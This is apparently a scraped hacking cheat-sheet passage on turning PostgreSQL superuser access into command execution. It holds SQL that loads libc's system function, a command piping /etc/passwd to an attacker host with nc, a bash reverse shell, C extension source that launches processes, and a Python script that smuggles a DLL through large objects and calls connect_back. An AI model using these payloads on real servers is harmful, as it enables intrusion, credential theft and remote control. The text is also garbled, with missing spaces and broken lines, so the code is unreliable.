CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/', 'system' LANGUAGE 'c' STRICT;
SELECTsystem('cat /etc/passwd | nc <attacker IP> <attacker port>');# You can also create functions toopenand write filesCREATE OR REPLACEFUNCTIONopen(cstring, int, int) RETURNSintAS'/lib/', 'open'LANGUAGE'C' STRICT;CREATE OR REPLACEFUNCTIONwrite(int, cstring, int) RETURNSintAS'/lib/', 'write'LANGUAGE'C' STRICT;CREATE OR REPLACEFUNCTIONclose(int) RETURNSintAS'/lib/', 'close'LANGUAGE'C' STRICT;
CREATE OR REPLACEFUNCTIONwrite_to_file(fileTEXT, s TEXT) RETURNSintAS$$DECLAREfh int;s int;w bytea;i int;BEGINSELECTopen(textout(file)::cstring, 522, 448) INTO fh;IF fh <=2THENRETURN1;ENDIF;SELECT decode(s, 'base64') INTO w;i :=0;LOOPEXIT WHEN i >= octet_length(w);SELECT write(fh,textout(chr(get_byte(w, i)))::cstring, 1) INTO rs;IF rs <0THENRETURN2;ENDIF;i := i +1;ENDLOOP;SELECTclose(fh) INTO rs;RETURN0;END;$$ LANGUAGE'plpgsql';
ERROR: incompatible library “/lib/x86_64-linux-gnu/”: missing magic blockHINT: Extension libraries are required to use the PG_MODULE_MAGIC macro.
CREATEFUNCTIONsys(cstring) RETURNSintAS'/tmp/','pg_exec'LANGUAGECSTRICT;SELECTsys('bash -c "bash -i >& /dev/tcp/ 0>&1"');#Notice the double single quotes are needed to scape the qoutes
#include"postgres.h"#include<string.h>#include"fmgr.h"#include"utils/geo_decls.h"#include<stdio.h>#include"utils/builtins.h"#ifdefPG_MODULE_MAGICPG_MODULE_MAGIC;#endif/* Add a prototype marked PGDLLEXPORT */PGDLLEXPORT Datum pgsql_exec(PG_FUNCTION_ARGS);PG_FUNCTION_INFO_V1(pgsql_exec);/* this function launches the executable passed in as the first parameterin a FOR loop bound by the second parameter that is also passed*/Datumpgsql_exec(PG_FUNCTION_ARGS){/* convert text pointer to C string */#defineGET_STR(textp) DatumGetCString(DirectFunctionCall1(textout,PointerGetDatum(textp)))/* retrieve the second argument that is passed to the function (an integer)that will serve as our counter limit*/int instances =PG_GETARG_INT32(1);for (int c =0; c < instances; c++) {/*launch the process passed in the first parameter*/ShellExecute(NULL,"open", GET_STR(PG_GETARG_TEXT_P(0)),NULL,NULL,1);}PG_RETURN_VOID();}
CREATE OR REPLACE FUNCTION remote_exec(text, integer) RETURNS void AS '\\\shared\pgsql_exec.dll', 'pgsql_exec' LANGUAGE C STRICT;
create function connect_back(text, integer) returns void as '../data/poc','connect_back' language C strict;select connect_back('',1234);
Note that you don't need to append the .dll extension as the create function will add it.
For more information read theoriginal publication here.
In that publication this was thecode use to generate the postgres extension (to learn how to compile a postgres extension read any of the previous versions).
In the same page this exploit to automate this technique was given:
#!/usr/bin/env python3import sysiflen(sys.argv)!=4:print("(+) usage %s <connectback> <port> <dll/so>"% sys.argv[0])print("(+) eg: %s 1234 si-x64-12.dll"% sys.argv[0])sys.exit(1)host = sys.argv[1]port =int(sys.argv[2])lib = sys.argv[3]withopen(lib, "rb")as dll:d = ="select lo_import('C:/Windows/win.ini', 1337);"for i inrange(0, len(d)//2048):start = i *2048end = (i+1) *2048if i ==0:sql +="update pg_largeobject set pageno=%d, data=decode('%s', 'hex') where loid=1337;"% (i, d[start:end].hex())else:sql += "insert into pg_largeobject(loid, pageno, data) values (1337, %d, decode('%s', 'hex'));" % (i, d[start:end].hex())
if (len(d)%2048) !=0:end = (i+1) *2048sql += "insert into pg_largeobject(loid, pageno, data) values (1337, %d, decode('%s', 'hex'));" % ((i+1), d[end:].hex())
sql +="select lo_export(1337, 'poc.dll');"sql +="create function connect_back(text, integer) returns void as '../data/poc', 'connect_back' language C strict;"sql +="select connect_back('%s', %d);"% (host, port)print("(+) building poc.sql file")withopen("poc.sql", "w")as sqlfile:sqlfile.write(sql)print("(+) run poc.sql in PostgreSQL using the superuser")print("(+) for a db cleanup only, run the following sql:")print(" select lo_unlink(l.oid) from pg_largeobject_metadata l;")print(" drop function connect_back(text, integer);")